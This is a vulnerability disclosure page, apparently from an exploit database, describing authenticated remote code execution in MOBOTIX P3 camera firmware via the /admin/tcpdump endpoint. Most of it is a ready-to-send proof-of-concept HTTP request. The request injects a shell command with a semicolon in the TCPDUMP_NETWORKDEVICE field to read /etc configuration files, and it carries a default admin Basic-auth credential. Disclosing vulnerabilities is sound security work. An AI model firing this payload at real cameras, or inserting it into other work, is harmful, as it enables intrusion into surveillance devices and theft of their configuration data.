MOBOTIX P3 Cameras MX-System < Authenticated Remote Code Execution Vulnerability

#Summary This vulnerability exists in versions of MOBOTIX P3 Cameras x14/x24/x15/x25, T24M/T25M prior to MX-System firmware. Due to the lack of input validation in the request sent to "/admin/tcpdump", this vulnerability leads to authenticated remote code execution. #Exploitation In the affected module, tcpdump integration through the network interface has been observed via the web portal. The input in the "TCPDUMP_NETWORKDEVICE" parameter allows bypassing input validation by using the ";" character, enabling the execution of system commands. # Proof of concept POST /admin/tcpdump HTTP/1.1 Host: User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:109.0) Gecko/20100101 Firefox/113.0 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8 Accept-Language: tr-TR,tr;q=0.8,en-US;q=0.5,en;q=0.3 Accept-Encoding: gzip, deflate Content-Type: application/x-www-form-urlencoded Content-Length: 153 Upgrade-Insecure-Requests: 1 Authorization: Basic YWRtaW46bWVpbnNt Connection: close TCPDUMP_NETWORKDEVICE=%3bcat+/etc/*.conf&TCPDUMP_PROTOCOL=all&TCPDUMP_CAPTURETIMEOUT=1&TCPDUMP_IGNORE_IP=

Vote for this issue:


Thanks for you vote!


Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024,


Back to Top